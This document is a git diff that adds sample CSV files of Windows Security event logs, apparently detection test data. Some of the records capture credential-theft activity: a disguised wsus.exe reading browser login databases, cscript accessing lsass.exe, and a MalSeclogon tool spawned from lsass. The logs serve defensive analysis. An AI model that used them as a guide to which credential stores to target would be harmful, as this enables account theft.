+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452916
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452915
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452914
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452913
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452912
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452911
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452910
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452909
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452908
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452907
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452906
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security,"
+
+
+
+
+ 4663
+ 1
+ 0
+ 12802
+ 0
+ 0x8020000000000000
+
+
+ 314462
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x33392
+ Security
+ Process
+ \Device\HarddiskVolume1\Windows\System32\lsass.exe
+ 0x558
+ %%4484
+
+ 0x10
+ 0x1688
+ C:\Windows\System32\cscript.exe
+ -
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4991
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4990
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4989
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
+2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12800
+ 0
+ 0x8020000000000000
+
+
+ 4988
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0xffa8
+ Security
+ File
+ C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data
+ 0x50
+ %%4416
+
+ 0x1
+ 0x134c
+ C:\Users\Defau1t\wsus.exe
+
+"
diff --git a/source/samples/Sample_Process_Execution_Events.csv b/source/samples/Sample_Process_Execution_Events.csv
new file mode 100644
index 0000000..9b38ae6
--- /dev/null
+++ b/source/samples/Sample_Process_Execution_Events.csv
@@ -0,0 +1,4130 @@
+DateTime,timestamp,EventID,ProcessName,User,ParentProcessName,RawLog
+2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329925
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x24e0
+ C:\Windows\System32\svchost.exe
+ %%1936
+ 0x274
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ C:\Windows\System32\services.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329921
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 0x1494
+ C:\Windows\System32\lsass.exe
+ %%1936
+ 0x27c
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ C:\Windows\System32\lsass.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329920
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 0x11e4
+ C:\Windows\System32\conhost.exe
+ %%1936
+ 0x17b8
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329919
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x17b8
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ %%1936
+ 0x27c
+
+ S-1-0-0
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ C:\Windows\System32\lsass.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329916
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x1bc4
+ C:\Windows\System32\svchost.exe
+ %%1936
+ 0x274
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ C:\Windows\System32\services.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329914
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x53ca2
+ 0x21a4
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ %%1937
+ 0x2480
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ C:\Windows\System32\cmd.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329925
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x24e0
+ C:\Windows\System32\svchost.exe
+ %%1936
+ 0x274
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ C:\Windows\System32\services.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329921
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 0x1494
+ C:\Windows\System32\lsass.exe
+ %%1936
+ 0x27c
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ C:\Windows\System32\lsass.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329920
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 0x11e4
+ C:\Windows\System32\conhost.exe
+ %%1936
+ 0x17b8
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329919
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x17b8
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ %%1936
+ 0x27c
+
+ S-1-0-0
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ C:\Windows\System32\lsass.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329916
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x1bc4
+ C:\Windows\System32\svchost.exe
+ %%1936
+ 0x274
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ C:\Windows\System32\services.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329914
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x53ca2
+ 0x21a4
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ %%1937
+ 0x2480
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ C:\Windows\System32\cmd.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329925
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x24e0
+ C:\Windows\System32\svchost.exe
+ %%1936
+ 0x274
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ C:\Windows\System32\services.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329921
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 0x1494
+ C:\Windows\System32\lsass.exe
+ %%1936
+ 0x27c
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ C:\Windows\System32\lsass.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329920
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 0x11e4
+ C:\Windows\System32\conhost.exe
+ %%1936
+ 0x17b8
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329919
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x17b8
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ %%1936
+ 0x27c
+
+ S-1-0-0
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ C:\Windows\System32\lsass.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329916
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x1bc4
+ C:\Windows\System32\svchost.exe
+ %%1936
+ 0x274
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ C:\Windows\System32\services.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329914
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x53ca2
+ 0x21a4
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ %%1937
+ 0x2480
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ C:\Windows\System32\cmd.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329925
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x24e0
+ C:\Windows\System32\svchost.exe
+ %%1936
+ 0x274
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ C:\Windows\System32\services.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329921
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 0x1494
+ C:\Windows\System32\lsass.exe
+ %%1936
+ 0x27c
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ C:\Windows\System32\lsass.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329920
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 0x11e4
+ C:\Windows\System32\conhost.exe
+ %%1936
+ 0x17b8
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329919
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x17b8
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ %%1936
+ 0x27c
+
+ S-1-0-0
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ C:\Windows\System32\lsass.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329916
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x1bc4
+ C:\Windows\System32\svchost.exe
+ %%1936
+ 0x274
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ C:\Windows\System32\services.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329914
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x53ca2
+ 0x21a4
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ %%1937
+ 0x2480
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ C:\Windows\System32\cmd.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329925
+
+
+
+
+ Security
